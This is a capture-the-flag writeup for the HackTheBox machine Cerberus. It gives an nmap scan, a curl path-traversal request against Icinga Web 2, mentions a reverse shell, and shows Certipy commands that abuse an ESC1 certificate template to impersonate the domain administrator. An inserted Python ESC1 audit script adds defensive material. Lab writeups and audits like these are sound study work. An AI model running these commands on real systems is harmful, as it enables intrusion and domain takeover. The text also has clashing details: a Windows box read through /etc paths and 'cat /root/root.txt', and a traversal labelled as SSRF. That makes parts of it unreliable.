HTB Writeup — Cerberus
Full walkthrough of the HackTheBox Cerberus machine covering initial enumeration, SSRF exploitation, and privilege escalation through a misconfigured AD certificate template.
HackTheBox: Cerberus
Difficulty: Hard
OS: Windows
Key Topics: SSRF, Active Directory Certificate Services, Kerberos
Enumeration
A full port scan reveals a web service on port 8080 and the standard AD services.
nmap -sCV -p- -T4 10.10.11.xxx -oN cerberus.nmap
Interesting findings:
- Port 8080 — Icinga Web 2 monitoring dashboard
- Port 88 — Kerberos
- Port 445 — SMB (signing required)
Initial Foothold
The Icinga instance is vulnerable to CVE-2022-24715 — an authenticated SSRF that can be chained with a file read to extract credentials from the internal management interface.
# Exploit the SSRF to hit the internal API
curl -k "https://target:8080/icingaweb2/lib/icinga/..%2f..%2f..%2fetc/icinga2/features-enabled/api.conf"
Lateral Movement
With the extracted API credentials, we authenticate to the Icinga2 API and trigger a reverse shell via a custom check command.
Privilege Escalation
The domain has a misconfigured certificate template (ESC1) allowing any authenticated user to request a certificate as the Domain Admin.
certipy find -u user@cerberus.htb -p 'P@ssword' -dc-ip 10.10.11.xxx
certipy req -u user@cerberus.htb -p 'P@ssword' -ca CERBERUS-CA -template VulnTemplate -upn administrator@cerberus.htb
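From the defender's side, the ESC1 condition above can be audited by checking each certificate template for the full set of attributes that make it abusable. The following is an added example, not part of the original writeup or of Certipy. The template records, the domain SID and the `enroll_sids` key (SIDs with Enroll rights, assumed already extracted from the template's security descriptor) are constructed for illustration.

```python
# Added example: ESC1 audit over certificate-template attributes (constructed data).
# "enroll_sids" is a hypothetical key: SIDs granted Enroll on the template.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag

# EKUs that let the issued certificate be used for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
BROAD_SIDS = {"S-1-1-0", "S-1-5-11"}  # Everyone, Authenticated Users
BROAD_RIDS = {"513", "515"}           # Domain Users, Domain Computers


def is_broad(sid):
    """True if the SID covers every ordinary domain account."""
    return sid in BROAD_SIDS or (
        sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in BROAD_RIDS)


def esc1_findings(t):
    """Return the ESC1 conditions a template meets, or [] if any one is absent."""
    ekus = t.get("pKIExtendedKeyUsage", [])
    checks = {
        "enrollee supplies subject":
            bool(t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval":
            not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": t.get("msPKI-RA-Signature", 0) == 0,
        "authentication EKU": not ekus or any(e in AUTH_EKUS for e in ekus),
        "broad enrollment rights": any(is_broad(s) for s in t["enroll_sids"]),
    }
    # ESC1 needs all five at once; removing any one condition closes it.
    return list(checks) if all(checks.values()) else []


DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
VULN = {"msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0, "enroll_sids": [DOMAIN + "-513"],
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]}
# Hardened copy: subject built from AD, manager approval required.
FIXED = {**VULN, "msPKI-Certificate-Name-Flag": 0x82000000, "msPKI-Enrollment-Flag": 0x2}
TEMPLATES = {"VulnTemplate": VULN, "VulnTemplate-fixed": FIXED}

if __name__ == "__main__":
    for name, attrs in TEMPLATES.items():
        print(name, "->", esc1_findings(attrs) or "not ESC1")
```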
Root Flag
cat /root/root.txt
# [REDACTED]
Lessons Learned
- Always check for ADCS misconfigurations — ESC1 through ESC8 are common in enterprise environments.
- SSRF is often underestimated; chained with internal services, it can lead to full compromise.